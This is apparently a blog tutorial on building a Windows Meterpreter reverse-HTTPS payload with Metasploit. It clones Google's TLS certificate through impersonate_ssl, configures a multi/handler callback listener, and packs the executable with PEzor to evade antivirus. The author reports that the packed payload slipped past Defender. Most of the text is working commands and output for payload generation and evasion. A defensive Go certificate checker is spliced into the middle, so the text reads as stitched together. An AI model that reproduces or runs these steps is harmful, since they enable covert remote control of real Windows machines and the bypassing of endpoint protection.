So, just a short piece on using spoofed SSL certificates with Metasploit and Meterpreter payloads.
Why use spoofed certs? Because they help us evade some of the security features in Windows, especially when the Meterpreter stage loads: if we don't encrypt the stage loader, AV will catch us and it's game over. And it's not complicated to do, so we might as well do it. This is a fast-track solution, not a walkthrough on using the Metasploit Framework, since that is rather large and pretty complicated and best suited for a themed series.
For a complete walkthrough on Metasploit, look here: https://www.offensive-security.com/metasploit-unleashed/
Also, for an introduction to PEzor, see the separate PEzor article.
There's a couple of other tools I would like to mention: ScareCrow, Ivy and LimeLighter.
They are for file spoofing, so exe files are signed with false certificates and look like they come from a trusted source, but at the time of writing they have not been tested in combination with PEzor payloads. Dedicated pieces on all of these tools will follow in time, so stay tuned.
But, how do we start? Here I've chosen to use the Metasploit console, because it's the easiest to navigate when you're new to Metasploit. So open up a terminal and launch it as root.
msfconsole
Now, the Metasploit Framework console looks like this.
=[ 2214 exploits - 1171 auxiliary - 396 post ]
+ -- --=[ 618 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the edit command to open the
currently active module in your editor
[*] Starting persistent handler(s)...
msf6 >
To generate a payload we have a couple of options: a normal (bind) shell and a reverse shell. Since we're using a reverse shell, we also need a listener, but we'll get back to that. Payload generation is our first task at hand, so let's search for a meterpreter payload. There are 200+ to choose from for different platforms, staged and unstaged, so choose your poison carefully :)
Now, what on earth are staged and unstaged payloads? Staged means that the payload that hits the target first is only a small loader (the stager) that calls home and downloads the rest of the shellcode. These are handy for their small size, so try them out.
The next type is unstaged (Metasploit calls them stageless): they contain it all in one package, so they are somewhat larger than staged payloads. Here I'm using an unstaged payload for testing.
# Staged payload. Note the / between meterpreter and reverse_tcp?
# That is the sign of a staged payload, the type being a reverse_tcp payload.
181 payload/windows/meterpreter/reverse_tcp
# Unstaged payload. Notice it says platform/type, this being a meterpreter_reverse_tcp.
# All types joined with _ are unstaged payloads.
223 payload/windows/meterpreter_reverse_tcp
# All payloads start with payload/platform/type
Since we're playing with spoofed SSL, let's list the payload options. We have a payload called "payload/windows/meterpreter_reverse_https", which is a likely candidate, so let's read more about it with this command.
msf6 > info payload/windows/meterpreter_reverse_https
Name: Windows Meterpreter Shell, Reverse HTTPS Inline
Module: payload/windows/meterpreter_reverse_https
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 176220
Rank: Normal
Provided by:
OJ Reeves
sf
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell. Requires
Windows XP SP2 or newer.
We see we need to set LHOST and LPORT, and for SSL we need two extra (advanced) options: StagerVerifySSLCert=true and HandlerSSLCert=spoofed_cert.pem.
So, let's set the payload, and we do that like so:
# Choose payload.
msf6 > use payload/windows/meterpreter_reverse_https
# Payload set, notice the changed prompt.
msf6 payload(windows/meterpreter_reverse_https) >
Now, list the options of the payload.
msf6 payload(windows/meterpreter_reverse_https) > show options
Module options (payload/windows/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
# Show advanced options for the payload
show advanced
Module advanced options (payload/windows/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
# Note there are a lot more options in the advanced settings, but we only need to set these two, plus the standard LPORT & LHOST.
Now, we need a certificate first, so let's create one before we return to the payload and listener. We do that with the auxiliary module impersonate_ssl.
msf6 payload(windows/meterpreter_reverse_https) > search SSL
Matching Modules
================
auxiliary/gather/impersonate_ssl
# Let's see some info
msf6 payload(windows/meterpreter_reverse_https) > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > show options
Module options (auxiliary/gather/impersonate_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
ADD_CN no Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT no CA Public certificate
EXPIRATION no Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT PEM yes Output format (Accepted: DER, PEM)
PRIVKEY no Sign the cert with your own CA private key
PRIVKEY_PASSWORD no Password for private key specified in PRIV_KEY (if applicable)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 443 yes The target port (TCP)
SNI no Server Name Indicator
To target a Google cert, we run it with:
set RHOST www.google.com
RHOST => www.google.com
msf auxiliary(impersonate_ssl) > run
It's going to save the certificate in /home/USER/.msf4/loot/some_file.pem. Remember that file location, since we'll need it later. My cert was saved to this file for testing:
/root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
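Worth knowing what this loot file actually is before we lean on it: impersonate_ssl copies the names and fields from the real site's certificate but signs them with a fresh key, so the result validates only under its own public key and chains to no trusted root. The Go check below is an added example (not code from this post or from Metasploit) that reports exactly those two facts for a PEM file like the one above; SpoofedFixture builds constructed test data with placeholder names (www.example.com, Example Trust CA) rather than cloning any real site.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/pem"
	"errors"
	"math/big"
	"time"
)

// Assess parses one PEM certificate and reports whether its signature
// validates under its own public key (a cloned cert copies the real issuer's
// name but is signed by a fresh key) and whether it chains to a root in roots.
func Assess(pemData []byte, roots *x509.CertPool, host string) (selfSigned, chains bool, err error) {
	block, _ := pem.Decode(pemData)
	if block == nil || block.Type != "CERTIFICATE" {
		return false, false, errors.New("no CERTIFICATE block in input")
	}
	cert, err := x509.ParseCertificate(block.Bytes)
	if err != nil {
		return false, false, err
	}
	selfSigned = cert.CheckSignature(cert.SignatureAlgorithm, cert.RawTBSCertificate, cert.Signature) == nil
	// Verify builds a path to a trusted root for host; an empty pool means nothing is trusted.
	_, verr := cert.Verify(x509.VerifyOptions{Roots: roots, DNSName: host})
	return selfSigned, verr == nil, nil
}

// SpoofedFixture is constructed test data shaped like impersonate_ssl output:
// believable subject and issuer names, but signed by a throwaway key.
func SpoofedFixture(host, issuer string) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	now := time.Now()
	leaf := &x509.Certificate{SerialNumber: big.NewInt(2), Subject: pkix.Name{CommonName: host}, DNSNames: []string{host},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour), ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}}
	parent := &x509.Certificate{Subject: pkix.Name{CommonName: issuer}} // name only: no real CA key involved
	der, err := x509.CreateCertificate(rand.Reader, leaf, parent, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der}), nil
}
```

Point the same Assess call at the real loot file with the system root pool and a genuine certificate passes the chain check while the impersonated one does not, which is why the names alone should never be trusted.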
So, now that we have a certificate file, we can start building our payload, so we set it again.
use windows/meterpreter_reverse_https
show options
set LHOST <YOUR_IP_TO_KALI_WORKSTATION>
# My setup for the test
set LHOST 10.0.0.52
set LPORT 8443
# SSL Cert options
set StagerVerifySSLCert true
StagerVerifySSLCert => true
set HANDLERSSLCERT /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
HANDLERSSLCERT => /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
# Confirm advanced settings
show advanced
Now we get to the fun part: building the payload file. We can do that with the generate command (-f is the output format, -o the output file).
generate -f exe -o /home/USERNAME/payload1.exe
To get help with the generate command, run generate -h
generate -f exe -o /home/nx/met_srv_rev_https_8443.exe
[*] Writing 251392 bytes to /home/nx/met_srv_rev_https_8443.exe...
So, now we have a reverse-connect Meterpreter, but we haven't got a listener yet, so let's set one up.
use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
set payload windows/meterpreter_reverse_https
payload => windows/meterpreter_reverse_https
set LHOST 10.0.0.52
LHOST => 10.0.0.52
set LPORT 8443
LPORT => 8443
set HANDLERSSLCERT /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
HANDLERSSLCERT => /root/.msf4/loot/20220507165717_default_142.250.74.35_142.250.74.35_pe_311446.pem
set StagerVerifySSLCert true
StagerVerifySSLCert => true
msf6 exploit(multi/handler) >
That's it, we're done building the payload and setting up the listener in Metasploit. Now we could run the listener with
exploit -j
BUT antivirus / Windows Defender would catch us right away. Now, for the fun part, enter PEzor!
Open another terminal and let's take it for a spin, to see if it can help us evade AV.
First you might need to change permissions on the payload. I always do, to make sure permissions are not tripping anything up and causing the tools to fail for some reason.
┌──(root💀cray)-[/home/nx]
└─# chmod 777 met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─# chmod +x met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─# chown nx:users met_srv_rev_https_8443.exe
┌──(root💀cray)-[/home/nx]
└─#
Now, we have a 32-bit Meterpreter payload. Remember that, since it's important to tell PEzor about it, using the -32 parameter.
/home/nx/Hentet/PEzor/PEzor.sh -32 -sgn -unhook -antidebug -text -sleep=10 -format=exe /home/nx/met_srv_rev_https_8443.exe
So, that should give us a payload file built with PEzor. Fire up a Windows machine, start the listener, and see if it connects back.
I tested the MSF payload before PEzor, and it got caught by Defender; after PEzor, it didn't get caught, so it works (for now anyway).
Much Happy Hacking